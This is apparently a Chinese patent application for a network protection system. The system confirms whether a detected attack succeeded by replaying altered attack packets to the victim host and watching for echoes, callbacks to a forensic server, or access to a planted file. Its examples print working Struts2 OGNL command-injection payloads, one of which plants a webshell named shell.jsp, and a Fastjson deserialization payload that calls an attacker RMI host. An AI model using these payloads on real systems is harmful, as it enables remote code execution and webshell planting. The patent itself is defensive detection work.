实现方式a-1、防护系统保存设定命令的预期结果。防护系统判断响应报文中携带的执行结果与设定命令对应的预期结果是否相同。如果响应报文中携带的执行结果与设定命令对应的预期结果相同,则防护系统确定第一攻击事件为攻击成功事件。
例如,设定命令的预期结果是设定命令中携带的字符串。比如说,设定命令的预期结果是设定命令中操作符(如echo、print等)后面的字符串。例如,设定命令是“echo预定字符串”,设定命令的预期结果为“预定字符串”。
又如,设定命令的预期结果是命令的语法规范中要求执行方返回的字符串。例如,设定命令是“id”,设定命令的预期结果包含“uid=”、“gid=”和“groups=”。例如,如果用户名是root且UID是0,则设定命令的预期结果为“uid=0(root)gid=0(root)groups=0(root)”。
再如,设定命令的预期结果是设备的一些参数的名称。例如,设定命令是“ifconfig”,设定命令的预期结果包含“RUNNING”、“mtu”、“inet”、“ether”和“netmask”。
可选地,设定命令的预期结果由网络管理员预先配置到防护系统上。
实现方式a-2、防护系统保存设定命令对应的正则表达式。防护系统判断响应报文中携带的执行结果是否满足设定命令对应的正则表达式。如果响应报文中携带的执行结果满足设定命令对应的正则表达式,则防护系统确定第一攻击事件为攻击成功事件。
例如,设定命令是“dir”,设定命令对应的正则表达式为“’\d{4}/\d{2}/\d{2}\s{1,10}\d{2}:\d{2}\s{1,10}<DIR>’”。又如,设定命令是“ls–l”,设定命令对应的正则表达式为“[d\-][rwx\-]{9}”。
可选地,设定命令对应的正则表达式由网络管理员预先配置到防护系统上。
实现方式b、防护系统基于受攻击主机对取证服务器的访问行为判定是否攻击成功。
在采用实现方式b的情况下,上文描述的特定事件包括在测试报文的发送时间点之后受攻击主机访问取证服务器。
具体地,防护系统获取取证服务器在测试报文的发送时间点之后的被访问记录;防护系统查询取证服务器的被访问记录中是否存在受攻击主机对应的记录,若被访问记录中存在受攻击主机对应的记录,则防护系统确定在测试报文的发送时间点之后受攻击主机访问取证服务器。
被访问记录是指取证服务器被取证服务器之外的其他设备访问的历史记录。防护系统如何获取取证服务器的被访问记录包括多种具体实现方式,下面结合获取方式一和获取方式二举例说明。
获取方式一、防护系统从取证服务器提供的访问日志中获取取证服务器的被访问记录。
访问日志是取证服务器生成的用于记录访问者的操作的文件。
如何产生访问日志包括多种实现方式,举例来说,取证服务器监听本设备上的端口是否被访问,如果监听到端口被访问,则取证服务器将访问者的IP地址、访问者的标识、访问时间点、被访问的端口的端口号等信息写入到一个文件中,从而得到访问日志。
防护系统如何获取访问日志包括多种方式,举例来说,取证服务器提供一个用于查询访问日志的接口,该接口例如是表述性状态传递(Representational State Transfer,REST)服务接口。防护系统调用取证服务器提供的接口,获得取证服务器提供的访问日志。
获取方式二、防护系统从后续流量中检测到取证服务器的被访问记录。
后续流量中的“后续”是相对于测试报文而言的,后续流量就是指在防护系统发送测试报文之后产生的流量。
在一种可能的实现中,防护系统基于取证服务器的IP地址和受攻击主机的IP地址,从后续流量中检测到取证服务器的被访问记录。举例来说,防护系统从后续流量中筛选源IP地址是受攻击主机的IP地址,且目的IP地址是取证服务器的IP地址的报文,防护系统根据筛选出的报文获得取证服务器的被访问记录。
防护系统如何查询是否存在受攻击主机对应的记录包括多种方式。可选地,防护系统根据受攻击主机的IP地址以及取证服务器上指定端口的端口号进行查询。其中,受攻击主机的IP地址来自于攻击报文中的目的IP地址字段,指定端口的端口号是指修改攻击报文时使用的端口号。
示例性地,攻击者A向受攻击主机B发送上述攻击报文,攻击报文包含攻击者A的IP地址1和攻击者A的端口号1。防护系统将攻击报文中的IP地址1替换为取证服务器的IP地址2,将攻击报文中的端口号1替换为取证服务器的端口号2。防护系统将替换后得到的测试报文发给受攻击主机B。之后,防护系统根据受攻击主机B的IP地址以及取证服务器的端口号2,查询是否存在受攻击主机B对取证服务器上端口号2的访问记录。
实现方式c、防护系统通过关联其他攻击事件判定是否攻击成功。
在采用实现方式c的情况下,上文描述的特定事件包括发送测试报文之后的受攻击主机相关的数据流中指定文件关联的第二攻击事件。
具体地,防护系统对发送测试报文之后的受攻击主机相关的数据流进行攻击检测。若检测到指定文件关联的第二攻击事件,则防护系统确定第一攻击事件为攻击成功事件。
上述第二攻击事件是第一攻击事件之外的与指定文件关联的攻击事件。例如,第二攻击事件对应的URL包含指定文件的文件名。第二攻击事件对应的源IP地址是防护系统的IP地址。第二攻击事件对应的目的IP地址是受攻击主机的IP地址。第二攻击事件例如是webshell事件。检测第二攻击事件时使用的数据流包括受攻击主机发送的报文和/或以受攻击主机为目的方的报文。
以指定文件是一个文件名为shell.jsp的文件为例描述,例如,防护系统检测的第一攻击事件是攻击者指示受攻击主机创建webshell文件shell.jsp。在判断第一攻击事件是否攻击成功的过程中,防护系统向受攻击主机发送针对文件shell.jsp的访问请求。如果防护系统后续检测到一个文件shell.jsp相关的攻击事件,则防护系统确定第一攻击事件为攻击成功事件。
实现方式d、防护系统根据指定文件是否能被成功访问判定是否攻击成功。
在采用实现方式d的情况下,上文描述的特定事件包括指定文件被成功访问。例如,在攻击报文指示受攻击主机创建指定文件的情况下,防护系统判断指定文件是否能被成功访问。如果指定文件能够被成功访问,则防护系统确定第一攻击事件为攻击成功事件。
防护系统如何确定指定文件是否能够被成功访问包括多种实现方式,下面结合实现方式d-1至实现方式d-2举例说明。
实现方式d-1、防护系统根据HTTP响应码确定指定文件能够被成功访问。
例如,防护系统从测试报文之后的受攻击主机相关的数据流中获得受攻击主机发送的针对测试报文的响应报文;防护系统从响应报文中解析得到HTTP响应码。若HTTP响应码是表示成功的响应码,防护系统确定指定文件被成功访问。
可选地,防护系统判断HTTP响应码是否是200,如果HTTP响应码是200,则防护系统确定指定文件被成功访问,那么防护系统会进一步确定第一攻击事件为攻击成功事件。作为一种替代方式,防护系统根据HTTP响应码的第一位数字判断,如果HTTP响应码的第一位数字是2,也就是说HTTP响应码是2xx成功类响应码,则防护系统确定指定文件被成功访问,那么防护系统会进一步确定第一攻击事件为攻击成功事件。
实现方式d-2、防护系统根据报文体中存在设定字符串确定指定文件能够被成功访问。
设定字符串表示指定文件被成功访问。该设定字符串例如是木马文件连接成功后的回显标识符。例如,设定字符串是“->|”。获取设定字符串的一种可能实现方式为,网络安全解决方案提供商对一些样本木马文件(如菜刀、XISE等攻击工具所使用的一句话木马)在连接成功后触发的响应报文进行特征提取,得到上述设定字符串,再将上述设定字符串预置在防护系统中。
例如,防护系统从测试报文之后的受攻击主机相关的数据流中获得受攻击主机发送的针对测试报文的响应报文;防护系统查找响应报文的报文体中是否存在设定字符串,若响应报文的报文体中存在设定字符串,防护系统确定指定文件被成功访问,则进一步确定第一攻击事件为攻击成功事件。
防护系统进行攻击成功判定之后执行的步骤包括多种情况。例如,防护系统通过上述实施例确定第一攻击事件为攻击成功事件后,防护系统下发处置策略,快速阻断网络攻击行为。又如,防护系统针对第二攻击事件执行上述实施例,确定第二攻击事件为未攻击成功事件,则防护系统生成并输出告警信息,告警信息用于通知运维人员确认受攻击主机是否存在相关漏洞。
下面再结合一些具体的应用场景和实例对图2所示方法举例说明。
图3是本实施例提供的一种防护系统的工作流程的框架图。图4是本实施例提供的一种防护系统30的工作详细流程图。
图3示出的防护系统30包括探针302、检测节点303和取证服务器304。可选地,结合图1来看,图3示出的防护系统30是图1中的防护系统10,图3示出的探针302是图1中的探针102,图3示出的检测节点303是图1中的防火墙101和/或安全分析器103。
探针302用于提取网络流量,作为检测节点303中攻击检测模块3031的输入,即图4中的S401。例如,如图3所示,探针302部署在“外部:攻击主机”(外部是指互联网)与“内部: 受攻击主机”(内部是指局域网)之间,探针302采集攻击主机与受攻击主机之间传输的流量,将流量发送给检测节点303。探针302包括而不限于防火墙探针或大数据产品探针。
检测节点303包括攻击检测模块3031、回显匹配攻击成功判定模块3032以及主动交互攻击成功判定模块3033。
攻击检测模块3031用于调用至少一种威胁检测算法对探针302上送的流量进行攻击检测,即图4中的S402。攻击检测模块3031使用的威胁检测算法包括而不限于反序列化攻击检测、命令注入检测等。攻击检测模块3031检测到攻击后,将攻击payload发送给回显匹配攻击成功判定模块3032。
回显匹配攻击成功判定模块3032用于通过单流判定服务端响应内容中是否存在payload执行结果,来判定是否攻击成功,即图4中的S403,如果匹配成功则结束,如果没有匹配成功,则将攻击payload发送给主动交互攻击成功判定模块3033,进入主动交互攻击成功判定的流程。
主动交互攻击成功判定模块3033用于基于主动交互的方式判断是否攻击成功,即图4中的S404。例如,主动交互攻击成功判定模块3033替换攻击payload,与受攻击主机主动交互,得到主动交互的流量。之后,主动交互攻击成功判定模块3033经过固定回显匹配、对取证服务器304的访问行为、其他攻击事件关联等进行成功判定,具体场景见下文实施例。
图3所示架构以取证服务器304和检测节点303分设为例描述。可替代地,取证服务器304和检测节点303是同一个设备,比如取证服务器304是检测节点303内的一个功能模块。
图3所示架构以攻击检测模块3031、回显匹配攻击成功判定模块3032以及主动交互攻击成功判定模块3033设于同一个设备为例进行描述。可替代地,攻击检测模块3031、回显匹配攻击成功判定模块3032以及主动交互攻击成功判定模块3033设于不同的设备,例如,攻击检测模块3031设于防火墙,回显匹配攻击成功判定模块3032以及主动交互攻击成功判定模块3033设于安全分析器。
下面结合3个实例,对上述图2所示方法举例说明。
下述3个实例均是图2所示方法的可能实现方式。其中,实例1和实例2是对S202中采用实现方式1的情况举例说明。实例3是对S202中采用实现方式2的情况的举例说明。具体地,实例1描述S202中采用实现方式1-1,并在S204中采用实现方式a的情况。实例2描述S202中采用实现方式1-2,并在S204中采用实现方式b的情况。实例3描述S202中采用实现方式2,并在S204中采用实现方式c或者实现方式d的情况。
实例1
实例1关于主动交互后基于固定回显匹配判定攻击成功。图5是本实施例提供的一种主动交互后基于固定回显匹配判定攻击成功的方法流程图。如图5所示,实例1的方法在包括图4中S401和S402的基础上,进一步包括以下步骤S501至步骤S503。
S501、防护系统解析攻击payload。防护系统从攻击payload提取攻击命令,将攻击命令替换为有固定回显的命令。
S502、防护系统使用修改后的payload,与受攻击主机主动交互。
S503、防护系统分析受攻击主机回应的响应报文。如果响应报文的内容包含设置的预期回显内容,则防护系统判定为攻击成功。
上述流程示例说明如下。
在上述S501中,攻击报文的payload如下,攻击命令为“pwd”。
username=admin&password=%{#a=(newjava.lang.ProcessBuilder(newjava.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=newjava.io.InputStreamReader(#b),#d=newjava.io.BufferedReader(#c),#e=newchar[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(newjava.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}.
防护系统将攻击命令“pwd”替换为echo命令“echo ognl_attack_test”。
在上述S502中,防护系统向受攻击主机发送命令替换后的payload。
在上述S503中,防护系统解析响应报文,判断响应报文的内容是否包含“ognl_attack_test”。若响应报文中包含“ognl_attack_test”则防护系统判定为攻击成功。
实例2
实例2关于主动交互后根据对取证服务器的访问行为进行攻击成功判定。图6是本实施例提供的一种主动交互后根据对取证服务器的访问行为进行攻击成功判定的方法流程图。如图6所示,该方法能覆盖反弹Shell、外发请求、SSRF等场景。如图6所示,安全分析器中设定一取证服务器(可与检测节点为同一设备)。网络管理员配置取证服务器的IP地址,开放取证服务器的部分端口,设置取证服务器的域名。取证服务器开放Web服务,取证服务器监听并记录被访问信息。如图6所示,实例2的方法在包括图4中S401和S402的基础上,进一步包括以下步骤S601至步骤S604。
S601、防护系统解析攻击payload,提取其中包含的IP地址和端口号、域名、URL等信息。防护系统将提取的信息替换为取证服务器对应的信息(IP地址、任一开放端口的端口号、域名、URL)。
S602、防护系统向受攻击主机发送修改后的payload。
S603、取证服务器时刻监听端口,并记录访问日志。
S604、当经过时间窗T后(秒级,例如10s)防护系统向取证服务器获取被访问记录,查询是否存在受攻击主机对取证服务器上指定端口的访问记录。若存在受攻击主机对取证服务器上指定端口的访问记录,则防护系统判定为攻击成功。其中,时间窗T是以发送修改后的payload为时间起始点、时长为设定时长的时间段。
上述流程示例说明如下。
在上述S601中,某反序列化攻击报文的payload如下。
{"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://A.B.C.D:6666/TouchFile",
"autoCommit":true
}}
防护系统从上述payload中提取到攻击者控制的URL为:rmi://A.B.C.D:6666/TouchFile,该URL对应的文件中往往包含恶意代码。其中,A.B.C.D表示IP地址,6666表示端口号。
在上述S602中,防护系统将A.B.C.D:6666替换为取证服务器的IP地址和开放的端口 192.168.1.1:6000,向受攻击主机发送修改后的payload。其中,192.168.1.1是对取证服务器的IP地址的举例说明,6000是对取证服务器的端口号的举例说明。
在上述S603中,防护系统若从取证服务器上获取到受攻击主机对取证服务器上端口号为6000的端口的访问记录,则防护系统判定为攻击成功。
实例3
实例3关于主动访问创建或修改的文件进行攻击成功判定。图7是本实施例提供的一种主动访问创建或修改的文件进行攻击成功判定的方法流程图。如图7所示,实例3的方法在包括图4中S401和S402的基础上,该方法包括以下步骤S701至步骤S703。
S701、防护系统解析攻击payload,识别是否存在文件创建行为或文件修改行为。防护系统从攻击payload提取被创建或被修改的文件的文件名。
S702、防护系统主动访问文件名对应的文件。
S703、防护系统关联其他攻击事件(比如webshell事件)。若关联成功,则防护系统判定攻击成功。或者,防护系统根据响应码判定是否攻击成功。
上述流程示例说明如下:
在上述S701中,攻击报文的payload如下。
/example/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true&(aaaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023vccc')(\u0023vccc\u003dnewjava.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("touch@/usr/local/tomcat/webapps/ROOT/WEB-INF/shell.jsp".split("@"))')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
防护系统提取到文件名shell.jsp。
在上述S702中,防护系统主动访问受攻击主机上文件/example/shell.jsp。
在上述S703中,若时间窗口T内发生(秒级,如20s)shell.jsp文件相关其他攻击事件(比如webshell事件),则防护系统判定攻击成功。其中,时间窗T是以访问受攻击主机上文件的时间点为时间起始点、时长为设定时长的时间段。或者,防护系统判断受攻击主机发送的响应报文中HTTP响应码是否是200,如果HTTP响应码是200,则判定攻击成功。
总结上述各个实施例可见,本申请实施例带来的有益效果包括而不限于下述(1)至(4)。
(1)快速从海量事件中筛选出高价值的攻击成功事件。
(2)解决了单流基于响应内容是否存在攻击命令的执行结果来进行攻击成功判定时,存在的如果没有回显则无法判定、如果回显难以预期则无法判定、攻击者容易通过编码绕过的问题。
回显难以预期的问题是指攻击命令的回显内容是可变的,以pwd命令为例,在root目录下执行pwd命令时回显为/root,在opt目录下执行pwd命令时回显为/opt;再比如whoami命令,执行whoami命令的回显为当前用户名,可能为root、admin或任意自定义的名称。上述实例1中,通过将攻击命令替换为“echo ognl_test”此类有固定回显内容的命令,从而解决了回显难以预期的问题。
编码绕过是指攻击者指示受攻击主机对命令的执行结果进行编码,再回应编码得到的结 果。例如,攻击报文中的命令为echo md5(test),回显内容是test的md5加密值”098F6BCD4621D373CADE4E832627B4F6”。又如,攻击报文中的命令为addHeader(‘X-Test’,233*233),回显内容为X-Test:54289,进行了简单的乘法计算。而上述实例1中,通过将攻击命令替换为有固定回显的命令如“echo ognl_test”,重新发送报文,如果攻击成功,则回显内容固定为ognl_test,因此解决了编码绕过的问题。
(3)解决多流关联方式时间窗口长、依赖攻击者行为等问题。
时间窗口长的问题是指,多流关联依赖于受攻击IP访问攻击payload中的数据流结束,或探针设备主动将此会话老化然后上送流量内容,而老化时间可能为10分钟或者更长,导致时间窗口很长。而上述实例2中,由于将攻击payload中的IP替换为取证服务器IP,受攻击IP访问取证服务器IP的时间能够实时感知,比如能够达到秒级,因此解决了时间窗口长的问题。
依赖攻击者行为的问题是指,对于植入webshell文件的场景,依赖于攻击者去访问webshell文件的时间点,而这一时间不确定,可能很长时间攻击者都未访问文件。而上述实例3中,由于防护系统代替攻击者主动访问此文件,因此解决了依赖攻击者行为的问题。
(4)无需终端侧日志采集关联分析,可落地性强。
总结上述各个实施例来看,上述各个实施例的一些可选实现方式中,依据攻击场景重新构造易识别的攻击payload,比如有固定回显的命令、固定的外联IP\域名、端口号,通过与受攻击主机主动交互发送构造的攻击payload,根据固定的回显、对取证服务器的访问行为或webshell等相关攻击事件关联识别攻击成功。
本实施例的应用场景不限于举例说明的基于回显匹配及反弹shell场景、外发请求场景、webshell植入场景等,主动交互方式来识别攻击成功均在本申请的保护范围内;实施例中关联时间窗口T的取值仅为实施参考值,只要思路与本申请实施例相同,时间窗口T取值不同于实施例中的参考值,亦在本申请的保护范围内。
图8是本申请实施例提供的一种攻击成功识别装置800的结构示意图,图8所示的装置800包括处理单元802和发送单元803。可选地,装置800还包括接收单元801。
可选地,结合图1所示的网络部署场景来看,图8所示的装置800设于图1中的防护系统10,例如,装置800设于图1中的防火墙101或者探针102或者安全分析器103,装置800通过防火墙101或者探针102或者安全分析器103中的硬件实现,或者通过防火墙101或者探针102或者安全分析器103中硬件执行相应的软件实现。
可选地,结合图2所示方法流程来看,图8所示的装置800设于图2中的防护系统,装置800用于支持防护系统执行图2所示方法,处理单元802用于支持防护系统执行S201、S202和S204,发送单元803用于支持防护系统执行S203。
可选地,结合图3所示系统架构来看,处理单元802包括图3中的攻击检测模块3031、回显匹配攻击成功判定模块3032、主动交互攻击成功判定模块3033以及端口访问监听与记录模块,发送单元803用于支持图3中的主动交互攻击成功判定模块3033将修改后的攻击payload发送至受攻击主机。
可选地,结合图4所示方法流程来看,图8所示的装置800用于支持防护系统执行图4 所示方法,接收单元801用于支持防护系统在S401中接收流量,处理单元802用于支持防护系统执行S402、S403和S404。
可选地,结合图5所示方法流程来看,图8所示的装置800用于支持防护系统执行图5所示方法,处理单元802用于支持防护系统执行S501和S503,发送单元803用于支持防护系统执行S502。
可选地,结合图6所示方法流程来看,图8所示的装置800用于支持防护系统执行图6所示方法,处理单元802用于支持防护系统执行S601、S603和S604,发送单元803用于支持防护系统执行S602。
可选地,结合图7所示方法流程来看,图8所示的装置800用于支持防护系统执行图7所示方法,处理单元802用于支持防护系统执行S701和S703,发送单元803和处理单元802共同用于支持防护系统执行S702。
图8所描述的装置实施例仅仅是示意性的,例如,上述单元的划分,仅仅为一种逻辑功能划分,实际实现时可以有另外的划分方式,例如多个单元或组件可以结合或者可以集成到另一个系统,或一些特征可以忽略,或不执行。在本申请各个实施例中的各功能单元可以集成在一个处理单元中,也可以是各个单元单独物理存在,也可以两个或两个以上单元集成在一个单元中。
装置800中的各个单元全部或部分地通过软件、硬件、固件或者其任意组合来实现。
在采用软件实现的情况下,例如,上述处理单元802是由图9中的至少一个处理器901读取存储器902中存储的程序代码后,生成的软件功能单元来实现。
在采用硬件实现的情况下,例如,图8中上述各个单元由不同硬件分别实现,例如处理单元802由图9中的至少一个处理器901中的一部分处理资源(例如多核处理器中的一个核或两个核)实现,或者采用现场可编程门阵列(field-programmable gate array,FPGA)、或协处理器等可编程器件来完成。接收单元801和发送单元803由图9中的网络接口903实现。
图9是本申请实施例提供的一种防护系统900的结构示意图。防护系统900包括至少一个处理器901、存储器902以及至少一个网络接口903。
可选地,结合图1所示的网络部署场景来看,图9所示的防护系统900为图1中的防护系统10。在一种可能的实现中,防护系统900中的处理器901、存储器902以及至少一个网络接口903分布在图1中的防火墙101、探针102或者安全分析器103上。
可选地,结合图2所示方法流程来看,图9所示的防护系统900为图2中的防护系统,防护系统900用于执行图2所示方法,处理器901用于支持防护系统执行S201、S202和S204,网络接口903用于支持防护系统执行S203。
可选地,结合图3所示系统架构来看,处理器901包括图3中的攻击检测模块3031、回显匹配攻击成功判定模块3032、主动交互攻击成功判定模块3033以及端口访问监听与记录模块,网络接口903用于支持图3中的主动交互攻击成功判定模块3033将修改后的攻击payload发送至受攻击主机。
可选地,结合图4所示方法流程来看,图9所示的防护系统900用于执行图4所示方法,网络接口903用于支持防护系统在S401中接收流量,处理器901用于支持防护系统执行S402、S403和S404。
可选地,结合图5所示方法流程来看,图9所示的防护系统900用于执行图5所示方法,处理器901用于支持防护系统执行S501和S503,网络接口903用于支持防护系统执行S502。
可选地,结合图6所示方法流程来看,图9所示的防护系统900用于执行图6所示方法,处理器901用于支持防护系统执行S601、S603和S604,网络接口903用于支持防护系统执行S602。
可选地,结合图7所示方法流程来看,图9所示的防护系统900用于执行图7所示方法,处理器901用于支持防护系统执行S701和S703,网络接口903和处理器901共同用于支持防护系统执行S702。
可选地,防护系统900为单台物理计算机。或者,防护系统900包括多台物理计算机,防护系统900的至少一个处理器901、存储器902以及至少一个网络接口903分布在不同物理计算机上。例如,防护系统900为集群计算机。
处理器901例如是通用中央处理器(central processing unit,CPU)、网络处理器(network processer,NP)、图形处理器(graphics processing unit,GPU)、神经网络处理器(neural-network processing units,NPU)、数据处理单元(data processing unit,DPU)、微处理器或者一个或多个用于实现本申请方案的集成电路。例如,处理器901包括专用集成电路(application-specific integrated circuit,ASIC),可编程逻辑器件(programmable logic device,PLD)或其组合。PLD例如是复杂可编程逻辑器件(complex programmable logic device,CPLD)、现场可编程逻辑门阵列(field-programmable gate array,FPGA)、通用阵列逻辑(generic array logic,GAL)或其任意组合。
存储器902例如是只读存储器(read-only memory,ROM)或可存储静态信息和指令的其它类型的静态存储设备,又如是随机存取存储器(random access memory,RAM)或者可存储信息和指令的其它类型的动态存储设备,又如是电可擦可编程只读存储器(electrically erasable programmable read-only Memory,EEPROM)、只读光盘(compact disc read-only memory,CD-ROM)或其它光盘存储、光碟存储(包括压缩光碟、激光碟、光碟、数字通用光碟、蓝光光碟等)、磁盘存储介质或者其它磁存储设备,或者是能够用于携带或存储具有指令或数据结构形式的期望的程序代码并能够由计算机存取的任何其它介质,但不限于此。可选地,存储器902独立存在,并通过内部连接904与处理器901相连接。或者,可选地存储器902和处理器901集成在一起。
网络接口903使用任何收发器一类的装置,用于与其它设备或通信网络通信。网络接口903例如包括有线网络接口或者无线网络接口中的至少一项。其中,有线网络接口例如为以太网接口。以太网接口例如是光接口,电接口或其组合。无线网络接口例如为无线局域网(wireless local area networks,WLAN)接口,蜂窝网络网络接口或其组合等。
在一些实施例中,处理器901包括一个或多个CPU,如图9中所示的CPU0和CPU1。
在一些实施例中,防护系统900可选地包括多个处理器,如图9中所示的处理器901和处理器905。这些处理器中的每一个例如是一个单核处理器(single-CPU),又如是一个多核处理器(multi-CPU)。这里的处理器可选地指一个或多个设备、电路、和/或用于处理数据(如计算机程序指令)的处理核。
在一些实施例中,防护系统900还包括内部连接904。处理器901、存储器902以及至少一个网络接口903通过内部连接904连接。内部连接904包括通路,在上述组件之间传送信 息。可选地,内部连接904是单板或总线。可选地,内部连接904分为地址总线、数据总线、控制总线等。
在一些实施例中,防护系统900还包括输入输出接口906。输入输出接口906连接到内部连接904上。
在一些实施例中,输入输出接口906用于与输入设备连接,接收用户通过输入设备输入的上述方法实施例涉及的命令或数据,例如设定命令、设定命令的预期结果、设定命令对应的正则表达式、取证服务器对应的地址信息、设定字符串等。输入设备包括但不限于键盘、触摸屏、麦克风、鼠标或传感设备等等等。
在一些实施例中,输入输出接口906还用于与输出设备连接。输入输出接口906通过输出设备输出处理器301执行上述方法实施例产生的中间结果和/或最终结果,例如标识第一攻击事件是否为攻击成功事件的信息。输出设备包括但不限于显示器、打印机、投影仪等等。
可选地,处理器901通过读取存储器902中保存的程序代码910实现上述实施例中的方法,或者,处理器901通过内部存储的程序代码实现上述实施例中的方法。在处理器901通过读取存储器902中保存的程序代码910实现上述实施例中的方法的情况下,存储器902中保存实现本申请实施例提供的方法的程序代码。
处理器901实现上述功能的更多细节请参考前面各个方法实施例中的描述,在这里不再重复。
在一些实施例中,还提供了一种计算机程序产品,所述计算机程序产品包括一个或多个计算机程序指令,当所述计算机程序指令被计算机加载并运行时,使得所述计算机执行上述方法实施例所提供的方法。
在一些实施例中,还提供了一种芯片,包括存储器和处理器,存储器用于存储计算机指令,处理器用于从存储器中调用并运行该计算机指令,以执行上述方法实施例所提供的方法。
本说明书中的各个实施例均采用递进的方式描述,各个实施例之间相同相似的部分可互相参考,每个实施例重点说明的都是与其他实施例的不同之处。
A参考B,指的是A与B相同或者A为B的简单变形。
本申请实施例的说明书和权利要求书中的术语“第一”和“第二”等是用于区别不同的对象,而不是用于描述对象的特定顺序,也不能理解为指示或暗示相对重要性。例如,第一攻击事件和第二攻击事件用于区别不同的攻击事件,而不是用于描述攻击事件的特定顺序,也不能理解为第一攻击事件比第二攻击事件更重要。
本申请实施例,除非另有说明,“至少一个”的含义是指一个或多个,“多个”的含义是指两个或两个以上。
上述实施例可以全部或部分地通过软件、硬件、固件或者其任意组合来实现。当使用软件实现时,可以全部或部分地以计算机程序产品的形式实现。所述计算机程序产品包括一个或多个计算机指令。在计算机上加载和执行所述计算机程序指令时,全部或部分地产生按照本申请实施例描述的流程或功能。所述计算机可以是通用计算机、专用计算机、计算机网络、或者其他可编程装置。所述计算机指令可以存储在计算机可读存储介质中,或者从一个计算机可读存储介质向另一个计算机可读存储介质传输,例如,所述计算机指令可以从一个网站 站点、计算机、服务器或数据中心通过有线(例如同轴电缆、光纤、数字用户线(DSL))或无线(例如红外、无线、微波等)方式向另一个网站站点、计算机、服务器或数据中心进行传输。所述计算机可读存储介质可以是计算机能够存取的任何可用介质或者是包含一个或多个可用介质集成的服务器、数据中心等数据存储设备。所述可用介质可以是磁性介质,(例如,软盘、硬盘、磁带)、光介质(例如,DVD)、或者半导体介质(例如固态硬盘Solid State Disk(SSD))等。
以上实施例仅用以说明本申请的技术方案,而非对其限制;尽管参照前述实施例对本申请进行了详细的说明,本领域的普通技术人员应当理解:其依然可以对前述各实施例所记载的技术方案进行修改,或者对其中部分技术特征进行等同替换;而这些修改或者替换,并不使相应技术方案的本质脱离本申请各实施例技术方案的范围。
Claims (28)
- 一种攻击成功识别方法,其特征在于,所述方法包括:对数据流进行攻击检测;若在所述数据流中检测到第一攻击事件,基于所述数据流中触发所述第一攻击事件的攻击报文,生成测试报文;向受攻击主机发送所述测试报文,所述受攻击主机为所述攻击报文的目的方;若检测到所述测试报文关联的特定事件,确定所述第一攻击事件为攻击成功事件。
- 根据权利要求1所述的方法,其特征在于,所述基于所述数据流中触发所述第一攻击事件的攻击报文,生成测试报文,包括:对所述攻击报文进行修改,将修改后的攻击报文作为所述测试报文。
- 根据权利要求2所述的方法,其特征在于,所述对所述攻击报文进行修改,包括:将所述攻击报文包含的攻击命令替换为设定命令,所述设定命令用于触发命令执行方回应所述设定命令的执行结果。
- 根据权利要求3所述的方法,其特征在于,所述特定事件包括所述受攻击主机发送的执行结果与所述设定命令的预期结果相同,所述检测到所述测试报文关联的特定事件,包括:接收所述受攻击主机发送的针对所述测试报文的响应报文;从所述响应报文中解析获得所述响应报文中携带的所述受攻击主机对所述设定命令的执行结果;确定所述响应报文中携带的执行结果与所述设定命令对应的预期结果相同。
- 根据权利要求4所述的方法,其特征在于,所述设定命令是“echo预定字符串”,所述设定命令的预期结果为“预定字符串”。
- 根据权利要求4所述的方法,其特征在于,所述设定命令是“id”,所述设定命令的预期结果为“uid=0(root)gid=0(root)groups=0(root)”。
- 根据权利要求3所述的方法,其特征在于,所述特定事件包括所述受攻击主机发送的执行结果满足所述设定命令对应的正则表达式,所述检测到所述测试报文关联的特定事件,包括:接收所述受攻击主机发送的针对所述测试报文的响应报文;从所述响应报文中解析获得所述响应报文中携带的所述受攻击主机对所述设定命令的执行结果;确定所述响应报文中携带的执行结果满足所述设定命令对应的正则表达式。
- 根据权利要求2所述的方法,其特征在于,所述对所述攻击报文进行修改,包括:将所述攻击报文包含的地址信息替换为取证服务器对应的地址信息。
- 根据权利要求8所述的方法,其特征在于,所述攻击报文包含的地址信息或者所述取证服务器对应的地址信息包括互联网协议IP地址、端口号、域名或者统一资源定位符URL中至少一项。
- 根据权利要求8或9所述的方法,其特征在于,所述特定事件包括在所述测试报文的发送时间点之后所述受攻击主机访问所述取证服务器,所述检测到所述测试报文关联的特定事件,包括:获取所述取证服务器在所述测试报文的发送时间点之后的被访问记录;若所述被访问记录中存在所述受攻击主机对应的记录,则确定所述在所述测试报文的发送时间点之后所述受攻击主机访问所述取证服务器。
- 根据权利要求1所述的方法,其特征在于,所述攻击报文用于指示所述受攻击主机创建或者修改指定文件,所述攻击报文包括所述指定文件的标识,所述基于所述数据流中触发所述第一攻击事件的攻击报文,生成测试报文,包括:基于所述攻击报文包含的所述指定文件的标识,生成所述测试报文,所述测试报文用于请求访问所述指定文件。
- 根据权利要求11所述的方法,其特征在于,所述特定事件包括发送所述测试报文之后的所述受攻击主机相关的数据流中所述指定文件关联的第二攻击事件。
- 根据权利要求11所述的方法,其特征在于,所述特定事件包括所述指定文件被成功访问,所述检测到所述测试报文关联的特定事件,包括:从所述测试报文之后的所述受攻击主机相关的数据流中获得所述受攻击主机发送的针对所述测试报文的响应报文;若所述响应报文中的超文本传输协议HTTP响应码是表示成功的响应码,确定所述指定文件被成功访问。
- 根据权利要求11所述的方法,其特征在于,所述特定事件包括所述指定文件被成功访问,所述检测到所述测试报文关联的特定事件,包括:从所述测试报文之后的所述受攻击主机相关的数据流中获得所述受攻击主机发送的针对所述测试报文的响应报文;若所述响应报文的报文体中存在设定字符串,确定所述第一攻击事件为攻击成功事件,所述设定字符串表示所述指定文件被成功访问。
- 根据权利要求1至14中任一项所述的方法,其特征在于,所述测试报文为HTTP请求报文。
- 一种攻击成功识别装置,其特征在于,包括:处理单元,用于对数据流进行攻击检测;所述处理单元,还用于若在所述数据流中检测到第一攻击事件,基于所述数据流中触发所述第一攻击事件的攻击报文,生成测试报文;发送单元,用于向受攻击主机发送所述测试报文,所述受攻击主机为所述攻击报文的目的方;所述处理单元,还用于若检测到所述测试报文关联的特定事件,确定所述第一攻击事件为攻击成功事件。
